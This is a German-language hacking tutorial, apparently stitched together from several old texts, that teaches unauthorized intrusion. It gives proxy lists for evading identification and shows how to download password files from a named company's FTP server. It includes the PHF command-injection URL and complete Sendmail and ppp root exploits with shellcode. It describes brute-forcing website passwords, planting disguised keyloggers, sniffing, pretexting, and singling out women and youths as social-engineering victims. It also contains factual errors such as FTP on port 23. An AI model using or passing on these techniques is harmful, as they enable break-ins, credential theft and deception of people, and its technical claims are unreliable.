Wer von euch will denn nicht anonym ins Internet gehen? viele denken wenn sie über einen call by call provider sich einwählen bei dem keine Registration notwendig ist, anonym surfen und somit im netzt illegale Sachen machen können, ohne ermittelt zu werden. sie haben zwar nicht deinen Namen welchen man bei andren Anbietern bei der Registration angeben muss.
aber sie wissen an welche Telefonnummer zu der bestimmten zeit die bestimmte IP Adresse vergeben worden ist. Und dann können sie über deine Telefongesellschaft den Namen der Person herausbekommen auf den die Telefonnummer angemeldet ist.


Funktion eines Proxyserver:
Und das sollte natürlich nicht passieren, deshalb ist es sehr nützlich über einen proxy server ins Internet zu gehen.
Proxyserver sind Server die zur beschleunigung des Internet eingesetzt werden, man kann sie aber auch nutzen um anonym zu bleiben.

Einstellungen im Browser:
Wenn ihr den Internet Explorer benutzt dann geht auf
extras-->internetoptionen--->verbindungen
dort wählt ihr den Zugang aus mit dem ihr euch einwählen wollt. dann wider auf ---> einstellungen dort klickt ihr auf Proxyserver verwenden und gebt die IP des Servers und den Port des Servers ein. Und schon bildet der Proxy Server einen Puffer zwischen deinem PC und dem Opfer PC. aber besser verwendet man ein Programm welche die Proxyserver auf ihre Anonymität überprüft, und die Verbindungen verwaltet. z.B. stealth anonymizer, a 4 proxy, multiproxy; lest die entsprechende Readme oder Help Datei der Programme durch, dort steht drin wie ihr den Browser konfigurieren müsst.

Proxy Server (kann sein das manche Server nicht mehr funzen oder nicht anonym sind):
194-183-137-019.tele.net:8080
adsl-63-192-133-209.dsl.snfc21.pacbell.net:1080 socks-proxy
fernwo.lnk.telstra.net:1080 socks-proxy
modemcable161.21-200-24.timi.mc.videotron.net:1080 socks-proxy
ankara3.turnet.net.tr:8080
cache-e0.hom.net:8080
cache.1st.net:8080
cache.a-net.net.th:8080
cache1.mtl.dsuper.net:8080
cacheflow.frontiernet.net:8080
cacheflow.tcg.sgi.net:8080
caligula.flash.net:8080
elpxy01.ce.mediaone.net:8080
fastweb.clover.net:8080
ftp.tcrz.net:8080
is.utel.net.ua:3128
jub-jub.thefree.net:8080
kraken.telstra.net:3128
ls4.internode.on.net.au:8080
ls5.internode.on.net.au:8080
ls6.internode.on.net.au:8080
ls7.internode.on.net.au:8080
ls8.internode.on.net.au:8080
ls9.internode.on.net.au:8080
magic.brasilnet.net:8080
nexus-1.flash.net:8080
nl-cache-1.nt.net:8080
nrl.onion-router.net:9200
ns.htc.net:8080

Testen der Anonymität:
Wenn ihr testen wollt ob ihr anonym seid müsst ihr auf eine der Seiten gehen und eure IP mit der auf der Seite angegebenen IP vergleichen
um eure IP herauszufinden macht dies: menü start---->ausführen
dort gebt ihr winipcfg ein und dort könnt ihr eure IP ablesen wenn sie mit der IP welche auf der Seite angegeben ist übereinstimmt war der Proxy Server nicht anonym und hat deine IP weitergegeben. Wähle dann einen andren Proxy Server aus. Bis deine IP nicht mehr angezeigt wird sondern die von dem Proxy Server. Hier ein paar Testseiten
http://privacy.net/anonymizer/
http://cpcug.org/scripts/env.cgi
http://www.rental-web.com/~azuma/cgi-bin/env.cgi













Hacking


Was ist FTP überhaupt?

FTP bedeutet File Transfer Protocol. Wie der Name schon sagt ist es ein Protokoll, welches explizit für den Up-/Download von Daten gedacht ist. Es wurde viele Jahre vor HTTP entwickelt, und ist dementsprechend auch etwas angestaubt. Da aber HTTP verhältnismässig langsamer als FTP ist, da bei HTTP immernoch Prüfdaten mitgeschickt werden, kann der Up-/Download mit FTP durchaus schneller sein. Aber FTP - welches über den Port 23 läuft - kann man auch für Spielereien einsetzen, wie diese Dokumentation über das Hacken eines FTP-Servers zeigen soll. Voraussetzungen für das Verständnis dieses Textes Von Nutzen für das Verstehen dieser Dokumentation kann durchaus die Kenntnis von FTP- und/oder Unix-Befehlen sein. Es gibt viele Bücher über dieses Thema: Schaut Euch nur mal in der lokalen Bibliothek um! Mein liebstes Buch für Unix-Einsteiger ist das “Unix Einsteigerseminar”, welches zum Beispiel in der Gemeindebibliothek Wettingen (AG) ausgeliehen werden kann. Mir ist die ISBN-Nummer leider nicht bekannt, aber der Umschlag ist blau, und es stammt aus dem Anfang der 90er Jahre. Was brauche ich für das Nutzen von FTP? Nach der Installation eines Modems oder Netzwerkkarte unter Windows9x wird automatisch die Software für den Client-Seitigen Betrieb von FTP mitinstalliert. Jene lässt sich ganz einfach mit der Eingabe von “ftp” im Menü Start/Ausführen/ starten. Danach erscheint ein kleines, schwarzes Fenster, welches stark der Eingabeaufforderung unter Windows ähnelt, nur dass statt dem Standart-Prompt von C:\> sich der FTP-Prompt mit FTP> meldet. Wie funktioniert FTP? Um einen kurzen Überblick über alle hier im FTP-Modus nutzbaren Befehle zu gewinnen, kann man einfach mal ? eingeben, woraufhin schön gegliedert alle FTP-Kommandos ohne weitere Informationen aufgelistet werden. Falls schnell vom FTP- in den DOS-Modus gewechselt werden muss, kann dies mit der Eingabe von "!" geschehen. Der FTP-Prompt ändert sich in den DOS-Prompt. Man kann ganz normal unter DOS arbeiten. Um wieder in den FTP-Modus zu gelangen, muss man "exit" eintippen, und danach ENTER drücken. Nun sollten wir uns mal langsam irgendwo connecten. Damit wir dies tun können, muss mindestens eine Netzwerk- oder Internet-Verbindung bestehen. Falls man sich innerhalb eines LAN’s befindet, welches von einer Firewall oder Proxy geschützt ist, kann es jedoch zu komplikationen kommen. Dazu jedoch später mehr. Der Einfachheits halber habe ich als Demo-FTP-Server den Server des Schweizer Konzerns namens ABB genommen, welcher weltweit für das Entwickeln und Herstellen von Turbinen zuständig ist. Um nun eine Verbindung zu einem FTP-Server herzustellen, muss entweder dessen URL oder die IP-Adresse bekannt sein. Die URL des ABB-FTP-Servers lautet ftp.abb.ch . Er ist natürlich auch unter der IP-Adresse erreichbar, welche 138.223.70.10 lautet. Nun muss man im FTP-Modus unserer FTP-Software "open ftp.abb.ch" eingeben. Alternativ kann man auch mit der IP-Nummer arbeiten. Dann würde die Eingabe "open 138.223.70.10" lauten. Danach erscheint ein Login-Bildschirm, der sehr stark an ein Unix-ähnliches System errinnernt. In den meisten Fällen wird auch ein Unix-ähnliches System für den Einsatz als FTP-Server eingesetzt. Auf der ersten Linie der Login-Prozedur erscheint noch einmal die Adresse, wo wir uns eingeloggt haben. Auf der nächsten zeile folgt die Version des Betriebssystems des FTP-Servers. Das Betriebssystem - in diesem Falle SunOS 5.6 - meldet sich bereit, und fragt uns nach einem User-Namen. Da uns kein User-Name bekannt ist, versuchen wir uns anonym anzumelden. Dabei erhalten wir nur Leserechte auf bestimmte regionen des Servers. Nach der Eingabe von "anonymous" für anonym, folgt eine Zeile, wo wir darauf aufmerksam gemacht werden, dass wir bei der Passworteingabe ohne weiteres unseren User-Namen verwenden können. Eine Zeile weiter werden wir auch schon nach unserem Paswort gefragt. Wir geben nocheinmal unseren User-Namen ein: "anonymous" . Es kann auch einfach eine wirrkürliche Zeichenfolge eingegeben werden, jedoch fällt man mit der schlichten Passwort-Eingabe des User-Namens weniger auf. Nun sollte eine kurze Meldung erscheinen, welche uns darauf aufmerksam macht, dass wir uns erfolgreich eingeloggt haben. Und am unteren Rand des Fensters folgt wieder der nackte FTP-Prompt. Nun nimmt es uns wunder, wo wir überhaupt gelandet sind. Mit der Eingabe von "pwd" erfragen wir unsere aktuelle Position im System. Wir werden darauf aufmerksam gemacht, dass wir uns im Root-Verzeichnis befinden. Welche Verzeichnisse existieren nun aber noch? Mit der Eingabe von "dir" für Directorie zaubern wir die aktuelle Übersicht aller Verzeichnisse und Dateien im Root-Verzeichnis an. Unsere Aufgabe ist es nun das Password-File zu finden, wo alle User-Namen mit dazugehörigem Passwort gespeichert sind. Mit "cd" (change directory) sind wir in der Lage das Verzeichnis zu wechseln. Wir geben nun cd etc ein, womit wir einen Augenblick später im ETC-Verzeichnis landen sollten. Wie jedesmal wenn wir in einem neuen Verzeichnis angelang sind, erfragen wir den Inhalt des momentanen Verzeichnisses. Nun erkennen wir sofort das Vorhandensein einer Datei namens passwd, zu welcher wir nur Leserechte haben. Wir kopieren nun diese Datei auf die lokale Festplatte. Dies geschieht mittels des Befehls "get" . Wir geben nun "get passwd" ein, und die Datei passwd wird auf den Windows-Desktop kopiert. Um ein Verzeichnis wieder zu verlassen, müssen wir wieder den change directoy Befehl nutzen. Mit "cd .." verlassen wir das aktuelle Verzeichnis und wechseln in das übergeordnete. In unserem Falle wäre dies wieder das Wurzel-Verzeichnis. Nun können wir die Verbindung schliessen. Dies übernimmt der Befehl "close" . Die Verbingung zum FTP-Server der ABB ist nun beendet. Um unsere FTP-Software zu schliessen, können wir ganz einfach "bye" eintippen, woraufhin sich die Software verabschiedet, und sich schliesst. Das Passwort-File Nun kommen wir wieder zurück auf unseren Windows-Rechner. Wir suchen nun das vom FTP-Server heruntergeladene File und öffnen es mit einem ganz normalen ASCII-Editor, wie zum Beispiel das Notepad von Microsoft. Nun offenbart sich uns das Password-File, aus welchem wir alle Benutzer-Namen ersehen können: root:x:0:1:Super-User:/:/usr/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
mailer:x:100:1::/home/mailer:/nosuchshell
proxadm:x:101:100::/home/proxadm:/nosuchshell
ftp:x:30000:30000:Anonymous FTP:/data/ftp:/nosuchshell Das erste Wort stellt den user-Namen dar. Nach dem Doppelpunkt folgt das dazugehörige Passwort. Falls dies nun ein X oder Leerzeichen sein sollte, dann wurden die Passwörter vom Administrator shadowed gemacht. Dies bedeutet, dass sie nur für den Admin einsehbar sind. Es gibt verschiedene Möglichkeiten diese shadowed Passcodes zu entschlüsseln, aber dazu schreibe ich später mal einen Text. Falls doch Passwörter ersichtlich sind, hat man das System geknackt, und ist nun im Besitze aller Passwörter. Das beste, was einem passieren kann, ist in den Besitz des Super-Visor-Passworts zu gelangen. Mit Hilfe dieses Passworts kann man sich als Root oder auch Super-User anmelden, und ist ab dann im Besitze aller Zugriffsrechte. Das System gehört dann sozusagen einem selbst. Disclaimer Denkt aber an die Hacker-Philosophie! Ausserdem macht Ihr Euch beim Eindringen in Fremde Systeme strafbar, und Ihr könnt strafrechtlich verfolgt werden! Wie knacke ich eine Firewall oder einen Proxy innerhalb eines LAN’s? Wie knackt man nun die eigene Firewall, wenn man sich als Hacker innerhalb eines LAN’s befindet? Man muss als allererstes die IP-Adresse der Firewall oder des Proxies herausfinden. Dies macht man mittels eines IP-Scanners oder Port-Scanners. Sobald man nun die IP-Nummer der Firewall hat, kann man sich mittels FTP wieder versuchen einzuloggen, und das Spiel kann beginnen...
Hacking Webpages:

The Parallel Minds Cooperation Die Anleitung Der amerikanische Hacker Psychotic schrieb eine der wohl am besten helfenden
Unix-Bibeln im Cyberspace, aber nachdem er diesen 36-seitigen Text veröffentlicht hatte, erreichten ihn unzählige Mails. Er erkannte das Unix nicht für jede Person ist, so schrieb er diesen Text, welcher die Anleitung zum Hacken von Webpages ist. 1.Zugriff zur Passwort-File durch FTP Der anonyme Zugriff durch FTP ist einer der einfachsten Wege um den Status eines Superusers zu erhalten. Als erstes musst du etwas über den Aufbau der Passwort-File wissen.

Root:User:d7Bdg:1n2HG2:1127:20:Superuser
Tom Jones:p5Y(h0tic:1229:20:Tom Jones, :/usr/people/tomjones:/bin/csh
Bbob:Euyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh Das ist ein Beispiel einer regulär verschlüsselten Passwort-File. Der Superuser ist
der Teil der dir den Zugriff gibt. Das ist der Hauptteil der File. Root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp
ftpadmin:x:203:102:ftp Administrator:/u1/ftp Das ist ebenfalls ein Beispiel einer Passwort File, allerdings mit einem Unterschied
.....sie ist versteckt. Versteckte Passwort-Files zeigen das verschlüsselte Passwort nicht an, sie lassen sich auch nicht kopieren .Das bringt Probleme für den Passwort- Cracker oder den Dictionary Cracker (später erklärt). Jetzt ein weiteres Beispiel
einer versteckten Password-File. root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
damon:x:1:1:0000-Admin:/:
bin:x:2:2:0000-Admin(0000):/usr/bin
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000) :/usr/spool/lp
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000) :/usr/lib/uucp
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:6002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:anonymous FTP:/export/home/anon_ftp:/bin/false Versteckte Password-Files haben ein "x" oder ein "*" an der Stelle des Passwortes. Nun, wo du ein bisschen mehr über die Password-File weißt, solltest du in der Lage sein, eine normal verschlüsselte Password-File und eine versteckte Password-File unterscheiden zu können. Wir gehen nun dazu über, wie man die Password-File crackt. Eine Password-File zu cracken ist nicht so kompliziert wie es sich anhört. Die einzige Hürde liegt darin, das sich die Files von System zu System zu unterscheiden. 1. Der erste Schritt, den du ausführen mußt ist, dass du dir die Password-File kopieren oder downloaden mußt. 2. Als zweites mußt du dir einen Password Cracker und einen Dictionary Maker besorgen. Obwohl es ziemlich einfach ist ,einen guten Password Cracker zu finden ,empfehle Ich dir einen der folgenden:
Cracker Jack, John the Ripper, Brute Force Cracker oder Jack the Ripper. Nun zum Dictionary Maker... Wenn du ein Crack-Prog startest, wirst du zuerst nach der Password-File gefragt.
Dort kommt dann auch der Dictionary Maker zum Einsatz. Einen Dictionary Maker kannst du von nahezu jeder Hackersite downloaden. Ein Dictionary Maker findet alle möglichen Buchstaben-Kombinationen mit den Möglichkeiten die du ausgewählt hast. (ASCII, caps, kleine buchstaben, Großbuchstaben und auch Nummern). 3. Du startest den Cracker und folgst den Instruktionen,die das Programm dir gibt.
2. Die PHF Technik Ich war nicht sicher, ob ich diese Section mit reinnehmen sollte, weil fast jeder über diese Technik bescheid weiß und die meisten Server haben den Bug schon beseitigt. Aber da es immer noch Fragen zur PHF gibt, schreibe ich diesen Teil mal mit rein. Die PHF Technik ist der einfachste Weg, eine Password File zu kriegen. Aber ich warne
euch....zu 95% wird diese Technik nicht funktionieren. Um die PHF auszuführen mußt du nix weiteres tun als einen Browser (IE 4 oder Netscape 4.05) öffnen und den folgenden Link eingeben: Http://website_ist_hier/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Ersetze das website_ist_hier mit der Domain. Wenn du also versuchst, die Passwort-File
für www.geocities.com zu erhalten, muß der Link so aussehen: http://www.geocities.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/password und das war´s. Du sitzt nur und kopierst die File (wenns funktioniert) 3. Telnet und Exploits Exploits sind der beste Weg Websites zu hacken, aber sie sind auch komplizierter als der Zugriff durch FTP und die PHF Technik .Bevor du ein Exploit verwenden kannst brauchst du erstmal ein Telnet Prog. Es gibt mehrere Verschiedene Anbieter von Telnet Proggies, mach einfach eine Net-Suche, und du wirst genügend Proggies und Zubehör finden.
Am besten richtest du dir einen Account bei deinem Ziel (wenn möglich) ein. Nun zu den Exploits. Exploits entdecken Fehler und Bugs in Systemen und geben dir gewöhnlicherweise vollen Zugriff. Es gibt viele verschiedene Exploits im Netz und du kannst sie dir alle angucken. Ich werde hier mal ein paar Beispiele von Exploits auflisten, aber die Liste der Exploits
ist endlos. Dieser Exploit ist bekannt unter dem Namen Sendmail v.8.8.4
Er erstellt ein Suid-Programm /tmp/x das den shell als Root herstellt.
So richtest du es ein: cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include <stdio.h>
main ( )
{
execl (RUN,RUN,NULL) ;
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main ( )
{
execl ("/usr/lib/sendmail ","/tmp/smtpd",0) ;
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main ( )
{
setuid (0) ; setgid (0) ;
system ("chown root /tmp/x ;chmod 4755 /tmp/x") ;
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/" [ ]*"// |cut -d" "
-f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd
/tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi nun zu einem anderen Exploit.....dem ppp vulnerbility.
So erstellst du ihn: #include <stdio.h>
#include <stdlib.h>
#include <unistd.h> #define BUFFER_SIZE 156 /* size of the buffer to overflow */ #define OFFSET -290 /* number of bytes to jump
after the start
of the buffer */ long get_esp (void) { __asm__("movl %esp,%eax\n"); } main (int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x 07\x89\x56\x0f" /* 16
bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x 0b\x89\xca\x52" /* 16
bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20
bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x 04\x07\x04"; /* 15
bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */

i = BUFFER_SIZE-strlen(execshell); memset(buf; 0x90, i);
ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i]; addr_prt = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr;
*ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL);
} Jetzt hast du den Zugriff.....Was jetzt????
Nun, die Wahl liegt bei dir, aber ich rate dir, zuerst das passwort zu ändern bevor du
irgendeine andere Aktion ausführst. Um das Password zu ändern mußt du dich via Telnet
einloggen und dich dann unter deinem neunen Account einloggen. Dann tippst du "PASSWD"
und es wird dich nach dem alten Passwort und danach nach deinem neuen Fragen. Du gibtst
dann dein neues ein, und das sollte es dann gewesen sein....du kannst jetzt uploaden,
löschen oder einfrach nur rumspielen..... HAVE PHUN!!!!!














Private Webseite hacken:

Ladet Euch von einer guten Hacker Seite das Programm "Unsecure" runter !
Startet das Programm ! Jetzt wird erklärt, wo Ihr was eingeben müsst : Computer name or IP: Hier gebt Ihr z.B ftp.fortunecity.de ein (Wenn die Webseite bei Fortunecity ist) !
Port: Hier gebt Ihr 21 ein (FTP Port) !
Passwort: Leer lassen
Username: Hier gebt Ihr den Benutzernamen ein (Teil der URL z.B www.fortunecity.de/members/hallo/index.htm ) hier also "hallo" !
Dictionary File: Hier gebt Ihr eine gute Wordlist ein ! Dictionary Attack: Wenn man bei dem Benutzernamen ein richtiges Passwort hat (z.B "zeus", dann anklicken, wenn es ein zusammengesetztes ist, also z.B "hdghd" dann nicht !
Brute Force Attack: Genau das Gegenteil von Dictinary Attack, hier werden alle Möglicheiten durchgegegangen (Auswahl siehe unten) !
Reconnect on disconnect: Auf jeden Fall anmachen !
AutoSave every 100 attempts: Das Projekt wird alle 100 gecheckten wörtern gesaved (autosave) ! Wenn es sich um eine Brute Force Attacke handelt oder um eine Dictionary Attacke, bei der keine Treffer erzielt
wurden, könnt Ihr hier auswählen, aus was für Charakteren das Passwort bestehen kann ! a-z Kleinbuchstaben
A-Z Großbuchstaben
0-9 Zahlen Das darunter sind Nebenzeichen ! Number of Characters: Wenn das Passwort minimal 3 Stellen hat, dann gebt hier eine 3 ein !
Custom character set: Hier könnt Ihr euch die Charaktere nochml manuell raussuchen ! Wenn alles richtig eingestellt ist klickt auf Connect !
Holt Euch was zu trinken (und zu Essen), denn es wird, wenn das Passwort leicht ist 1-2 Stunden dauern !
Wenn es aber schwer ist kann es auch 20-30 Stunden dauern ! Am besten ist es wenn man die Autosave Funktion
aktiviert, und jedesmal wenn man online geht, macht man ein bißchen weiter.


Vom Menschen zum Unix-Hacker:

Wie bekomme ich (illegalen) Zugang zum Internet?
Die Literatur:
Der unangenehme Teil oder:
Der Schlüssel zum Erfolg
Wie komme ich weiter?
Wie rette ich meinen Arsch?
Ein paar Gedanken zum Sein eines Hackers
Yeah, time to become 31337.
Ein Blick ueber die Schulter
Persoenliche Sicherheit
Wichtige Links

- Vorwort -
Auch wenn es fuer einen Anfaenger hart ist aber ich werde gewisse Dinge wie NIS, PasswordCracker, PacketSniffer, et cetera nicht erklaeren; ich setze sie als bekannt voraus. Wenn du mit diesen Dingen arbeitest wirst du sie verstehen, und in den Buechern/Docs werden sie haeufig auch erklaert. Ich werde einige Programme, die ich in diesem Docu. erwaehne, in dieses Paket packen.
Zeilen, die mit dem Groesser-als Zeichen '>' beginnen sind Eingaben (von dir).
Zeilen, die mit dem Kleiner-als Zeichen '<' beginnen, stellen Ausgaben (z.B. von einem Programm) dar.
Befehle werden fett gedruckt und Captures mit Rot indiziert.



- Voraussetzungen -
Ja gut, die Voraussetzungen um Hacker zu werden.... Also, das wichtigste ist ein eiserner Wille; du musst Hacker werden wollen, mit jeder Zelle deines Koerpers ;) - aber nicht verkrampfen, denn dann wird der Fluss der Phantasie blockiert ;). Ein IQ >= 100 waer' auch ganz sinnvoll... hmmm, aja, 'n Computer und 'n Modem... sind deine Hauptwerkzeuge. Du solltest in C programmieren koennen, da auf (fast) jedem Unix-System ein C- Compiler installiert ist und der groesste Teil der Sourcecodes in C geschrieben ist.
Ich werde unter Punkt 3 ein Buch vorstellen, das meiner Meinung nach eine sehr gute und umfassende Grundlage fuer's Programmieren in C bietet, falls du schon eine Hochsprache beherrschst und dir einiges zutraust, dann reicht es, das Buch ueber Unix Systemprog. zu lesen (s. Punkt 3).
Desweiteren ist es sinnvoll Linux/FreeBSD (auf keinem Fall DLD Linux, is' echter Schrott ;) ) auf seinem Rechner zu installieren. Linux/FreeBSD ist ein Unix fuer PCs. Es gibt noch weitere Unixes fuer den PC wie BSDI, OpenBSD, Solarix x86, SCO etc. aber das braucht dich ersteinmal nicht zu interessieren ;-)

- Wie bekomme ich (illegalen) Zugang zum Internet? -
Also mir kommen jetzt mehrere Methoden in den Sinn, ich werde mal mit der Methode beginnen, die ich auch verwendet habe - sozusagen die Methode, die ihren Praxistest schon bestanden hat. Such dir eine nette Uni (Internet Provider, Firma mit Internet-Access) in deiner Naehe aus und mache dort ein Praktikum, einen Ferienjob oder einen Nebenjob.
Waehrend deiner Taetigkeit immer schoen die Augen nach Rechnern aufhalten, die ans Uni-Netz angeschlossen sind, die von den Studenten genutzt werden und allgemein zugaenglich sind. Haeufig steht irgendwo ein alter DOS- PC rum, oder es existieren PC-Pools. Such dir einen Rechner aus und sieh dir seinen Aufbau an (autoexec.bat & config.sys...) und beobachte wie er benutzt wird (laeuft er staendig, wird er nachts ausgeschaltet). Lass dich mal ganz plump von 'nem Studenten in die Benutzung des Rechners einfuehren. Dann benutze diesen Rechner fuer anonymous FTP, HTTP und den ganzen Kram, der kein Passwort erfordert, und wenn sich die Gelegenheit mal bietet, dann kopiere dir die "autoexec.bat", "config.sys" und den Stammverzeichnisbaum (tree) auf 'ne Diskette.
So jetzt zum spannenden Teil. Es geht darum ein TSR-Programm zu installieren, welches die Tastatureingaben in eine Datei protokolliert . Um dieses TSR-Prog. so gut wie moeglich zu verstecken tarnt man es als ein anderes Prog. und fuegt einen entsprechenden Eintrag in die autoexec.bat ein. Man kann z.B. den Mouse-Treiber mit einer Batch-Datei ersetzen, die erst unser TSR und dann den Mouse-Treiber aufruft o. ae.. Man kann natuerlich auch das TSR vor mem verstecken (ich glaube man veraendert irgendwie 'ne Memorygrenze - keine Ahnung).
Evtl. muss man das TSR mit einem HEX-Editor seinen Anforderungen anpassen. Es sollte auch darauf geachtet werden, dass die Protokolldatei den ganzen Plattenplatz aufzehren koennte, also taeglich die Datei auf Diskette bringen und von der Platte entfernen. Desweiteren muessen die Timestamps angepasst werden - ja, Paranoia ist die Lebensversicherung eines Hackers.
So, um die ganze Angelegenheit zu beschleunigen tippe jeweils eine Batch-Datei fuer die Installation des TSRs, fuer das move'n der Protokolldatei und zum Deinstallieren des TSRs und zur Wiederherstellung des Orginalzustandes (Timestamps nicht vergessen). Teste deine Startegie und deine Batch-Dateien auf deinem Rechner, in der Praxis darf es keine Fehler mehr geben, alles muss schnell und reibungslos verlaufen. Interpretation der Protokolldatei:
Wenn du z.B. folgendes siehst
ftp blah.am.arsch.de
franz
schwanz




... dann existiert auf dem Rechner "blah.am.arsch.de" ein Account mit dem Login "franz" und den Passwort "schwanz" - vorausgesetzt, dass die Eingaben richtig waren :).
Wichtig sind fuer dich erstmal die Rechner im Uni-Netz. Desweiteren kannst du natuerlich auch einfach in den Computer-Systemen Trojan-Horses einbringen oder ganz
simpel den Leuten ueber die Schulter sehen, wenn sie sich in die Rechner einloggen. Die "Experten" unter euch koennen einen Vampire-Tap oder einen Laptop mit Sniffer in deren Netz einbringen und so
einfach die Account-Informationen aufzeichnen.
Der Vorteil des Vampire-Taps ist, dass es nicht durch Messgeraete entdeckt werden kann, die die Entfernung bis
zum naechsten Ende/Bruch im Netzkabel messen. Unter Windows (3.11) kannst du den Macrorecorder zur Aufzeichnug der Tastatureingaben verwenden... is' aber nicht so toll... mach deine eigenen Erfahrungen, es erfordert auf jeden Fall mehr Aufmerksamkeit von dir. Eine bessere Loesung ist da schon eine veraenderte WINSOCK.DLL zu installieren, die alle Daten, die uebers Netz gehen aufzeichnet. Natuerlich kannst du auch einen auf DOS basierenden Sniffer installieren. Wenn du ein paar Accounts gesammlt hast, musst du die Telefonnummer des Modems rausfinden, die dich mit dem Netz der Uni verbindet.
Die Nummer bekommst du ganz einfach: Ruf' bei der Uni an, gib dich als Student aus und frag' nach der Nummer - du musst sicher und ruhig sprechen. Haeufig steht die Nummer auch in 'nem Infoblatt vom Rechenzentrum (RZ) oder auf deren Web-Site.
Die Bequemlichkeit beim Verwalten und Verwenden von Account Informationen kommt dir beim Einloggen zugute, undzwar ist es (meistens) voellig egal auf welchem Rechner im Uni-Netz du landest, denn viele User verwenden das selbe Passwort auf mehreren Rechnern (auch in anderen Domains) oder es wird NIS (oder NIS+, rdist, DCE, etc) benutzt
So, wenn du in dem System bist, dann mache dich damit vertraut (in Uni-Systemen faellt man nicht so schnell auf).
Von der Uni aus, kannst du dann am Besten noch Domains hacken, die in deinem City-Tarif Bereich liegen um deine Telefonkosten zu verringern - auch wenn die gehackte Uni im City-Tarif Bereich ist. Je mehr Einwahlpunkte du zum Internet hast um so besser.
Du kannst deine Telefongebueren auch sparen, indem du 'ne PBX hackst (im 0130/0800- Bereich oder von lokalen Firmen) oder durch BlueBoxing - ist mir persoenlich zu gefaehrlich und zu auffaellig, da die Telekom gerne BlueBoxer kennen lernen will und PBXs meistens gute Intrusion Detection Systems besitzen. ;)
Bei Firmen ist es meistens etwas gefaehrlicher. Die einfachste Methode ist natuerlich, wenn dir ein bekannter Hacker einen Account gibt. Falls du schon einen Unix-/NT-Account hast, dann lad' dir einfach die Passwortdatei auf deinen Rechner und cracke die Passwoerter.
Oder ein temporaerer Freund mit Internet-Anschluss hilft dir weiter. ;) Und nun noch ein old-school Weg. Er erfordert weniger den technischen sondern mehr den physischen und mentalen Aufwand.
Such' dir ein/e Institut/Firma mit Internetanschluss in deiner Stadt aus. Jetzt musst du erstmal jedemenge Infos ueber dein Ziel sammeln, egal wie unwichtig sie erscheinen. Du brauchst z.B. den Namen des Admins und der User, Beziehungen zu anderen Instituten/Firmen. Um diese Dinge in Erfahrung zu bringen kannst du den Muell der Firma durchsuchen (sog. "Dumpster Diving") oder dich mal 'n bisschen umhoeren. Jetzt nur noch die Modemnummer herausfinden:
Entweder einfach anrufen und als User (wenn du den Namen eines Kunden hast, dann benutze ihn auch), der die Nummer vertroedelt hat, ausgeben oder den Telefonnummernbereich deines Ziels durchscannen.
Das Scannen geht wie folgt:
Du waehlst eine Nummer und horchst ob ein Modem dranhaengt - diese Aufgabe kann auch ein Prog. uebernehmen. Viele Firmen belegen einen bestimmten Nummernbereich, z.B. eine 6stellige Nummer wobei die ersten 3 Zahlen statisch sind (z.B. 911) und die letzten 3 Zahlen variieren (0 bis 999; wobei 0 meistens die Telefonzentrale, Pforte, etc ist). Nun waehlst du alle Nr. von 911-0 bis 911-999 bis du ein Modem gefunden hast; falls du ein Anrufbeantworter entdeckst, dann versuche ihn zu hacken (weitere Infos).
Du kannst den zuscannenden Bereich einschraenken indem du dir die Durchwahlnummer des RZs, DVZs (Datenverarb. Zentrum) - oder wie sonst die Abteilung fuer die Rechnerverwaltung heisst - geben laesst und dann von dort startest (Bsp.: Durchwahl: 345, dann faengst du bei 911-300 an). So jetzt Accounts besorgen.
Rufe einen User an - dabei solltest du folgendes beachten: suche dir am Besten nur Frauen
oder Jugendliche aus, da diese Personen leichtglaeubiger und techn. weniger versiert sind.
